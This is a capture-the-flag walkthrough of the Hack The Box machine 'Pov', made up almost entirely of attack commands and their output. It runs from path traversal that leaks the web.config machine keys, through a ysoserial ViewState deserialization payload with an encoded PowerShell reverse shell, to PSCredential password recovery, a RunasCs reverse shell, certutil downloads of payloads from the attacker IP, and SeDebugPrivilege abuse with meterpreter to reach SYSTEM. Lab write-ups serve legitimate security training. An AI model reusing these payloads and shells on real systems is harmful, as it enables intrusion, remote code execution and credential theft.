HTB - Pov [Medium]
TCP Scan
> TARGET=10.10.11.251 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
10.10.11.251 pov.htb
web enum
# dir
> dirsearch -u http://pov.htb
[11:10:47] 301 - 141B - /js -> http://pov.htb/js/
[11:10:59] 301 - 142B - /css -> http://pov.htb/css/
[11:11:02] 301 - 142B - /img -> http://pov.htb/img/
# subdomain
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://pov.htb/" -H "Host: FUZZ.pov.htb"
000000019: 302 1 L 10 W 152 Ch "dev"
- found
sfitz@pov.htb
js/aos.js
dev.pov.htb
<img src=x onerror=fetch('http://10.10.16.25/?test');>
- http://dev.pov.htb/portfolio/default.aspx contains a hidden field
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="8E0F0FA3" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="pKRfSQVwTXuS6kVYT5HN2vbyKYD9SxhB8n36YxAc3mJUyHotu1LL1Q7fX05AqeZWO4ECmn7piWH4LT752VBODG9M1CPjOdeXPj1T7Mq5HoTxgnFlyzudz4JTsRPzuzInh8sRnQ==" />
</div>
<a id="download" class="btn btn-primary rounded mt-3" href="javascript:__doPostBack('download','')">Download CV</a>
<input type="hidden" name="file" id="file" value="cv.pdf" />
- The hidden field can be tampered to download other files
curl http://dev.pov.htb/portfolio/default.aspx -d '__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=3jhZQ80uYBK7wDtBeLk9ntkG16XNS1k8%2FJnzqxL8iZVqSLb4SWi%2BC0LqaqnQDF7uPgVKjRwmspitdp5OsU%2BTBINy1vk%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=9H9JGD49BR2zrl3BVhIIYtvjDUKEJ3C%2Bp69RuS41S7oO08wkPYe4YFYEcqfdrktkwrbIvvb8jjJpx32tEDDtTKKq4HcSO9beOZQKeVSmYAUOh5AI7MRhWpo3ZCDfs3I4rdqARw%3D%3D&file=default.aspx'
- path traversal possible
// curl http://dev.pov.htb/portfolio/default.aspx -d '__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=3jhZQ80uYBK7wDtBeLk9ntkG16XNS1k8%2FJnzqxL8iZVqSLb4SWi%2BC0LqaqnQDF7uPgVKjRwmspitdp5OsU%2BTBINy1vk%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=9H9JGD49BR2zrl3BVhIIYtvjDUKEJ3C%2Bp69RuS41S7oO08wkPYe4YFYEcqfdrktkwrbIvvb8jjJpx32tEDDtTKKq4HcSO9beOZQKeVSmYAUOh5AI7MRhWpo3ZCDfs3I4rdqARw%3D%3D&file=index.aspx.cs'
using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Text.RegularExpressions;
using System.Text;
using System.IO;
using System.Net;
public partial class index : System.Web.UI.Page {
protected void Page_Load(object sender, EventArgs e) {
}
protected void Download(object sender, EventArgs e) {
var filePath = file.Value;
filePath = Regex.Replace(filePath, "../", "");
Response.ContentType = "application/octet-stream";
Response.AppendHeader("Content-Disposition","attachment; filename=" + filePath);
Response.TransmitFile(filePath);
Response.End();
}
}
- continue
> wfuzz -u http://dev.pov.htb/portfolio/default.aspx -d '__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=3jhZQ80uYBK7wDtBeLk9ntkG16XNS1k8%2FJnzqxL8iZVqSLb4SWi%2BC0LqaqnQDF7uPgVKjRwmspitdp5OsU%2BTBINy1vk%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=9H9JGD49BR2zrl3BVhIIYtvjDUKEJ3C%2Bp69RuS41S7oO08wkPYe4YFYEcqfdrktkwrbIvvb8jjJpx32tEDDtTKKq4HcSO9beOZQKeVSmYAUOh5AI7MRhWpo3ZCDfs3I4rdqARw%3D%3D&file=FUZZ' --hh 168 -w /usr/share/wordlists/Bug-Bounty-Wordlists/webconfig.txt
000000007: 200 14 L 37 W 866 Ch "/web.config"
> curl http://dev.pov.htb/portfolio/default.aspx -d '__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=3jhZQ80uYBK7wDtBeLk9ntkG16XNS1k8%2FJnzqxL8iZVqSLb4SWi%2BC0LqaqnQDF7uPgVKjRwmspitdp5OsU%2BTBINy1vk%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=9H9JGD49BR2zrl3BVhIIYtvjDUKEJ3C%2Bp69RuS41S7oO08wkPYe4YFYEcqfdrktkwrbIvvb8jjJpx32tEDDtTKKq4HcSO9beOZQKeVSmYAUOh5AI7MRhWpo3ZCDfs3I4rdqARw%3D%3D&file=/web.config'
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
> ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/default.aspx" -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgA1ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
- initate another donwload and replace the ViewState parameter with the generated payload from above
- land as use
sfitz
S C:\users\sfitz\documents> dir
Directory: C:\users\sfitz\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/25/2023 2:26 PM 1838 connection.xml
PS C:\users\sfitz\documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
- run the following on the victim under desktop directory
echo "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6" > pass.txt
$EncryptedString = Get-Content .\pass.txt
$SecureString = ConvertTo-SecureString $EncryptedString
$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString
echo $Credential.GetNetworkCredential().password
f8gQ8fynP44ek1m3
.\RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.16.25:5555
C:\Windows\system32>whoami
whoami
pov\alaading
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Windows\system32>type C:\Users\alaading\Desktop\user.txt
type C:\Users\alaading\Desktop\user.txt
ce9d9b6187e9835c02fab2668f6352a6
- https://devblogs.microsoft.com/oldnewthing/20080314-00/?p=23113
- SeDebugPrivilege, once enabled, can debug a process owned by system
- https://github.com/fashionproof/EnableAllTokenPrivs
certutil.exe -urlcache -f http://10.10.16.25/payload.exe payload.exe
certutil.exe -urlcache -f http://10.10.16.25/EnableAllTokenPrivs.ps1 EnableAllTokenPrivs.ps1
PS C:\Users\alaading\Desktop> .\EnableAllTokenPrivs.ps1
.\EnableAllTokenPrivs.ps1
PS C:\Users\alaading\Desktop> dir
Directory: C:\Users\alaading\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/26/2024 6:15 PM 3449 EnableAllTokenPrivs.ps1
-a---- 3/26/2024 6:10 PM 7168 payload.exe
-ar--- 3/25/2024 10:02 PM 34 user.txt
PS C:\Users\alaading\Desktop> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
meterpreter > migrate 556
[*] Migrating from 2072 to 556...
[*] Migration completed successfully.
meterpreter > whoami
[-] Unknown command: whoami. Run the help command for more details.
meterpreter > shell
Process 1832 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
be6a84de155f24391e7e635f1f1d9e80
C:\Windows\system32>
psgetsys.ps1
certutil.exe -urlcache -f http://10.10.16.25/psgetsys.ps1 psgetsys.ps1
[MyProcess]::CreateProcessFromParent(556,".\payload.exe")
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack